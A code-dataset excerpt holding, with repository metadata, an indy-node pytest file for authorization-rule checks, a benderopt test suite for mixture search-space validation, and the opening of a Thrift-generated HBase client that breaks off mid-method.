0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 580
|
2017-06-29T17:59:57.000Z
|
2022-03-29T21:37:52.000Z
|
indy_common/test/auth/metadata/test_auth_rule_with_metadata_simple.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 704
|
2017-06-29T17:45:34.000Z
|
2022-03-30T07:08:58.000Z
|
from indy_common.authorize.auth_constraints import AuthConstraint, IDENTITY_OWNER, AuthConstraintForbidden
from indy_common.constants import ENDORSER
from indy_common.test.auth.metadata.helper import validate, PLUGIN_FIELD, Action
from plenum.common.constants import TRUSTEE
MAX_SIG_COUNT = 3
def test_plugin_simple_rule_1_sig_owner_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=IDENTITY_OWNER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: s},
is_owner=True, amount=2, extra_sigs=False)
for s in range(1, MAX_SIG_COUNT + 1)
],
author=IDENTITY_OWNER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_owner_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=IDENTITY_OWNER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={IDENTITY_OWNER: s1, ENDORSER: s2},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
],
author=IDENTITY_OWNER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_endorser_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=ENDORSER, endorser=None, sigs={ENDORSER: s},
is_owner=True, amount=2, extra_sigs=True)
for s in range(1, MAX_SIG_COUNT + 1)
],
author=ENDORSER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_endorser_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=ENDORSER, endorser=ENDORSER, sigs={ENDORSER: s},
is_owner=True, amount=2, extra_sigs=True)
for s in range(1, MAX_SIG_COUNT + 1)
],
author=ENDORSER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=None, sigs={ENDORSER: s1, TRUSTEE: s2},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
],
author=TRUSTEE, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_trustee_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=ENDORSER, sigs={TRUSTEE: s2, ENDORSER: s3},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
for s3 in range(1, MAX_SIG_COUNT + 1)
],
author=TRUSTEE, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_all_roles_owner_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: s},
is_owner=True, amount=2, extra_sigs=False)
for s in range(1, MAX_SIG_COUNT + 1)
],
author=IDENTITY_OWNER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_all_roles_owner_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={IDENTITY_OWNER: s1, ENDORSER: s2},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
],
author=IDENTITY_OWNER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_all_roles_trustee_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=None, sigs={TRUSTEE: s1},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
],
author=TRUSTEE, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_all_roles_trustee_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=ENDORSER, sigs={TRUSTEE: s1, ENDORSER: s2},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
],
author=TRUSTEE, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_3_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=None, sigs={TRUSTEE: 3},
is_owner=owner, amount=2, extra_sigs=True)
for owner in [True, False]],
author=TRUSTEE, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_3_sig_trustee_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=ENDORSER, sigs={TRUSTEE: 3, ENDORSER: s1},
is_owner=owner, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for owner in [True, False]
],
author=TRUSTEE, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_3_sig_owner_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[],
author=IDENTITY_OWNER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_3_sig_owner_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={TRUSTEE: 3, IDENTITY_OWNER: s1, ENDORSER: s2},
is_owner=owner, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
for owner in [True, False]
],
author=IDENTITY_OWNER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_0_sig_owner_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[Action(author=IDENTITY_OWNER, endorser=None, sigs={},
is_owner=owner, amount=2, extra_sigs=False)
for owner in [True, False]] + [
Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: s},
is_owner=owner, amount=2, extra_sigs=False)
for owner in [True, False]
for s in range(1, MAX_SIG_COUNT + 1)],
author=IDENTITY_OWNER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_0_sig_owner_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={ENDORSER: s},
is_owner=owner, amount=2, extra_sigs=True)
for s in range(1, MAX_SIG_COUNT + 1)
for owner in [True, False]],
author=IDENTITY_OWNER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_0_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[Action(author=TRUSTEE, endorser=None, sigs=signature,
is_owner=owner, amount=2, extra_sigs=True)
for signature in signatures
for owner in [True, False]],
author=TRUSTEE, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_0_sig_trustee_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[Action(author=TRUSTEE, endorser=ENDORSER, sigs={ENDORSER: s},
is_owner=owner, amount=2, extra_sigs=True)
for s in range(1, MAX_SIG_COUNT + 1)
for owner in [True, False]],
author=TRUSTEE, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_not_allowed(write_auth_req_validator, write_request_validation,
author, endorser, signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraintForbidden(),
valid_actions=[],
author=author, endorser=endorser,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
| 50.955357
| 116
| 0.635535
| 1,946
| 17,121
| 5.181912
| 0.034943
| 0.052063
| 0.06783
| 0.118703
| 0.960631
| 0.959738
| 0.959738
| 0.947739
| 0.945359
| 0.938715
| 0
| 0.012304
| 0.292682
| 17,121
| 335
| 117
| 51.107463
| 0.820396
| 0
| 0
| 0.780405
| 0
| 0
| 0.000467
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064189
| false
| 0
| 0.013514
| 0
| 0.077703
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4002ec11f18ba86940bda122bbfda09957c38321
| 7,491
|
py
|
Python
|
benderopt/tests/validation/test_mixture.py
|
tchar/benderopt
|
83a6bbb9c5732f6232c1a1bbc971f8022a975a28
|
[
"MIT"
] | 66
|
2019-01-08T14:34:21.000Z
|
2020-10-22T00:54:58.000Z
|
benderopt/tests/validation/test_mixture.py
|
tchar/benderopt
|
83a6bbb9c5732f6232c1a1bbc971f8022a975a28
|
[
"MIT"
] | 4
|
2019-03-03T19:17:26.000Z
|
2020-10-22T18:37:30.000Z
|
benderopt/tests/validation/test_mixture.py
|
tchar/benderopt
|
83a6bbb9c5732f6232c1a1bbc971f8022a975a28
|
[
"MIT"
] | 5
|
2019-04-29T03:28:54.000Z
|
2020-10-22T19:45:40.000Z
|
import pytest
from benderopt.validation.mixture import validate_mixture, validate_mixture_value
from benderopt.validation.utils import ValidationError
def test_mixture_search_space_ok():
search_space = {
"weights": [0.5, 0.5],
"parameters": [
{
"category": "normal",
"search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1,},
},
{
"category": "categorical",
"search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]},
},
],
}
search_space = validate_mixture(search_space)
def test_mixture_search_space_bad():
search_space = ["bma"]
with pytest.raises(ValidationError):
search_space = validate_mixture(search_space)
def test_mixture_search_space_no_parameters():
search_space = {
"weights": [0.5, 0.5],
# "parameters": [
# {
# "category": "normal",
# "search_space": {
# "mu": 0.5,
# "sigma": 1,
# "low": -5,
# "high": 5,
# "step": 0.1,
# }
# },
# {
# "category": "categorical",
# "search_space": {
# "values": [1, 2, 3],
# "probabilities": [0.1, 0.2, 0.7]
# }
# }
# ]
}
with pytest.raises(ValidationError):
search_space = validate_mixture(search_space)
def test_mixture_search_space_bad_parameters():
search_space = {
"weights": [0.5, 0.5],
"parameters": {
"category": "normal",
"search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1,},
},
}
with pytest.raises(ValidationError):
search_space = validate_mixture(search_space)
def test_mixture_search_space_missing_category():
search_space = {
"weights": [0.5, 0.5],
"parameters": [
{
# "category": "normal",
"search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1,}
},
{
"category": "categorical",
"search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]},
},
],
}
with pytest.raises(ValidationError):
search_space = validate_mixture(search_space)
def test_mixture_search_space_bad_category():
search_space = {
"weights": [0.5, 0.5],
"parameters": [
{
"category": "lol",
"search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1,},
},
{
"category": "categorical",
"search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]},
},
],
}
with pytest.raises(ValidationError):
search_space = validate_mixture(search_space)
def test_mixture_search_space_missing_search_space():
search_space = {
"weights": [0.5, 0.5],
"parameters": [
{
"category": "normal",
# "search_space": {
# "mu": 0.5,
# "sigma": 1,
# "low": -5,
# "high": 5,
# "step": 0.1,
# }
},
{
"category": "categorical",
"search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]},
},
],
}
with pytest.raises(ValidationError):
search_space = validate_mixture(search_space)
def test_mixture_search_space_bad_search_space():
search_space = {
"weights": [0.5, 0.5],
"parameters": [
{"category": "normal", "search_space": ["lol"]},
{
"category": "categorical",
"search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]},
},
],
}
with pytest.raises(ValidationError):
search_space = validate_mixture(search_space)
def test_mixture_search_space_error_validation():
search_space = {
"weights": [0.5, 0.5],
"parameters": [
{
"category": "normal",
"search_space": {"mu": 0.5, "sigma": 1, "low": 50, "high": 5, "step": 0.1,},
},
{
"category": "categorical",
"search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]},
},
],
}
with pytest.raises(ValidationError):
search_space = validate_mixture(search_space)
def test_mixture_search_space_bad_weights():
search_space = {
"weights": 1,
"parameters": [
{
"category": "normal",
"search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1,},
},
{
"category": "categorical",
"search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]},
},
],
}
with pytest.raises(ValidationError):
search_space = validate_mixture(search_space)
def test_mixture_search_space_bad_weights_size():
search_space = {
"weights": [1],
"parameters": [
{
"category": "normal",
"search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1,},
},
{
"category": "categorical",
"search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]},
},
],
}
with pytest.raises(ValidationError):
search_space = validate_mixture(search_space)
def test_mixture_search_space_bad_weights_sum():
search_space = {
"weights": [0.25, 0.25],
"parameters": [
{
"category": "normal",
"search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1,},
},
{
"category": "categorical",
"search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]},
},
],
}
with pytest.raises(ValidationError):
search_space = validate_mixture(search_space)
def test_mixture_search_space_no_weights():
search_space = {
"parameters": [
{
"category": "normal",
"search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1,},
},
{
"category": "categorical",
"search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]},
},
]
}
search_space = validate_mixture(search_space)
assert "weights" in search_space.keys()
assert sum(search_space["weights"]) == 1
def test_validate_mixture_value():
search_space = {
"parameters": [
{
"category": "normal",
"search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1,},
},
{
"category": "categorical",
"search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]},
},
]
}
validate_mixture_value("lol", **search_space)
| 28.701149
| 92
| 0.457749
| 724
| 7,491
| 4.520718
| 0.066298
| 0.278949
| 0.142988
| 0.079438
| 0.903147
| 0.895509
| 0.895509
| 0.895509
| 0.895509
| 0.895509
| 0
| 0.050053
| 0.375918
| 7,491
| 260
| 93
| 28.811538
| 0.650053
| 0.066079
| 0
| 0.544503
| 0
| 0
| 0.176952
| 0
| 0
| 0
| 0
| 0
| 0.010471
| 1
| 0.073298
| false
| 0
| 0.015707
| 0
| 0.089005
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
405a8de28620665eaaf041c61af7f70f220efde2
| 94,322
|
py
|
Python
|
core/sqf/src/seatrans/hbase-trx/src/main/python/thrift2/gen-py/hbase/THBaseService.py
|
CoderSong2015/Apache-Trafodion
|
889631aae9cdcd38fca92418d633f2dedc0be619
|
[
"Apache-2.0"
] | 148
|
2015-06-18T21:26:04.000Z
|
2017-12-25T01:47:01.000Z
|
core/sqf/src/seatrans/hbase-trx/src/main/python/thrift2/gen-py/hbase/THBaseService.py
|
CoderSong2015/Apache-Trafodion
|
889631aae9cdcd38fca92418d633f2dedc0be619
|
[
"Apache-2.0"
] | 1,352
|
2015-06-20T03:05:01.000Z
|
2017-12-25T14:13:18.000Z
|
core/sqf/src/seatrans/hbase-trx/src/main/python/thrift2/gen-py/hbase/THBaseService.py
|
CoderSong2015/Apache-Trafodion
|
889631aae9cdcd38fca92418d633f2dedc0be619
|
[
"Apache-2.0"
] | 166
|
2015-06-19T18:52:10.000Z
|
2017-12-27T06:19:32.000Z
|
#
# Autogenerated by Thrift Compiler (0.9.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def exists(self, table, get):
"""
Test for the existence of columns in the table, as specified in the TGet.
@return true if the specified TGet matches one or more keys, false if not
Parameters:
- table: the table to check on
- get: the TGet to check for
"""
pass
def get(self, table, get):
"""
Method for getting data from a row.
If the row cannot be found an empty Result is returned.
This can be checked by the empty field of the TResult
@return the result
Parameters:
- table: the table to get from
- get: the TGet to fetch
"""
pass
def getMultiple(self, table, gets):
"""
Method for getting multiple rows.
If a row cannot be found there will be a null
value in the result list for that TGet at the
same position.
So the Results are in the same order as the TGets.
Parameters:
- table: the table to get from
- gets: a list of TGets to fetch, the Result list
will have the Results at corresponding positions
or null if there was an error
"""
pass
def put(self, table, put):
"""
Commit a TPut to a table.
Parameters:
- table: the table to put data in
- put: the TPut to put
"""
pass
def checkAndPut(self, table, row, family, qualifier, value, put):
"""
Atomically checks if a row/family/qualifier value matches the expected
value. If it does, it adds the TPut.
@return true if the new put was executed, false otherwise
Parameters:
- table: to check in and put to
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- put: the TPut to put if the check succeeds
"""
pass
def putMultiple(self, table, puts):
"""
Commit a List of Puts to the table.
Parameters:
- table: the table to put data in
- puts: a list of TPuts to commit
"""
pass
def deleteSingle(self, table, deleteSingle):
"""
Deletes as specified by the TDelete.
Note: "delete" is a reserved keyword and cannot be used in Thrift
thus the inconsistent naming scheme from the other functions.
Parameters:
- table: the table to delete from
- deleteSingle: the TDelete to delete
"""
pass
def deleteMultiple(self, table, deletes):
"""
Bulk commit a List of TDeletes to the table.
Throws a TIOError if any of the deletes fail.
Always returns an empty list for backwards compatibility.
Parameters:
- table: the table to delete from
- deletes: list of TDeletes to delete
"""
pass
def checkAndDelete(self, table, row, family, qualifier, value, deleteSingle):
"""
Atomically checks if a row/family/qualifier value matches the expected
value. If it does, it adds the delete.
@return true if the new delete was executed, false otherwise
Parameters:
- table: to check in and delete from
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- deleteSingle: the TDelete to execute if the check succeeds
"""
pass
def increment(self, table, increment):
"""
Parameters:
- table: the table to increment the value on
- increment: the TIncrement to increment
"""
pass
def openScanner(self, table, scan):
"""
Get a Scanner for the provided TScan object.
@return Scanner Id to be used with other scanner procedures
Parameters:
- table: the table to get the Scanner for
- scan: the scan object to get a Scanner for
"""
pass
def getScannerRows(self, scannerId, numRows):
"""
Grabs multiple rows from a Scanner.
@return Between zero and numRows TResults
Parameters:
- scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function.
- numRows: number of rows to return
"""
pass
def closeScanner(self, scannerId):
"""
Closes the scanner. Should be called if you need to close
the Scanner before all results are read.
Exhausted scanners are closed automatically.
Parameters:
- scannerId: the Id of the Scanner to close *
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def exists(self, table, get):
"""
Test for the existence of columns in the table, as specified in the TGet.
@return true if the specified TGet matches one or more keys, false if not
Parameters:
- table: the table to check on
- get: the TGet to check for
"""
self.send_exists(table, get)
return self.recv_exists()
def send_exists(self, table, get):
self._oprot.writeMessageBegin('exists', TMessageType.CALL, self._seqid)
args = exists_args()
args.table = table
args.get = get
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_exists(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = exists_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "exists failed: unknown result");
def get(self, table, get):
"""
Method for getting data from a row.
If the row cannot be found an empty Result is returned.
This can be checked by the empty field of the TResult
@return the result
Parameters:
- table: the table to get from
- get: the TGet to fetch
"""
self.send_get(table, get)
return self.recv_get()
def send_get(self, table, get):
self._oprot.writeMessageBegin('get', TMessageType.CALL, self._seqid)
args = get_args()
args.table = table
args.get = get
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "get failed: unknown result");
def getMultiple(self, table, gets):
"""
Method for getting multiple rows.
If a row cannot be found there will be a null
value in the result list for that TGet at the
same position.
So the Results are in the same order as the TGets.
Parameters:
- table: the table to get from
- gets: a list of TGets to fetch, the Result list
will have the Results at corresponding positions
or null if there was an error
"""
self.send_getMultiple(table, gets)
return self.recv_getMultiple()
def send_getMultiple(self, table, gets):
self._oprot.writeMessageBegin('getMultiple', TMessageType.CALL, self._seqid)
args = getMultiple_args()
args.table = table
args.gets = gets
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getMultiple(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getMultiple_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "getMultiple failed: unknown result");
def put(self, table, put):
"""
Commit a TPut to a table.
Parameters:
- table: the table to put data in
- put: the TPut to put
"""
self.send_put(table, put)
self.recv_put()
def send_put(self, table, put):
self._oprot.writeMessageBegin('put', TMessageType.CALL, self._seqid)
args = put_args()
args.table = table
args.put = put
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_put(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = put_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.io is not None:
raise result.io
return
def checkAndPut(self, table, row, family, qualifier, value, put):
"""
Atomically checks if a row/family/qualifier value matches the expected
value. If it does, it adds the TPut.
@return true if the new put was executed, false otherwise
Parameters:
- table: to check in and put to
- row: row to check
- family: column family to check
- qualifier: column qualifier to check
- value: the expected value, if not provided the
check is for the non-existence of the
column in question
- put: the TPut to put if the check succeeds
"""
self.send_checkAndPut(table, row, family, qualifier, value, put)
return self.recv_checkAndPut()
def send_checkAndPut(self, table, row, family, qualifier, value, put):
self._oprot.writeMessageBegin('checkAndPut', TMessageType.CALL, self._seqid)
args = checkAndPut_args()
args.table = table
args.row = row
args.family = family
args.qualifier = qualifier
args.value = value
args.put = put
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_checkAndPut(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = checkAndPut_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.io is not None:
raise result.io
raise TApplicationException(TApplicationException.MISSING_RESULT, "checkAndPut failed: unknown result");
def putMultiple(self, table, puts):
"""
Commit a List of Puts to the table.
Parameters:
- table: the table to put data in
- puts: a list of TPuts to commit
"""
self.send_putMultiple(table, puts)
self.recv_putMultiple()
def send_putMultiple(self, table, puts):
self._oprot.writeMessageBegin('putMultiple', TMessageType.CALL, self._seqid)
args = putMultiple_args()
args.table = table
args.puts = puts
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_putMultiple(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
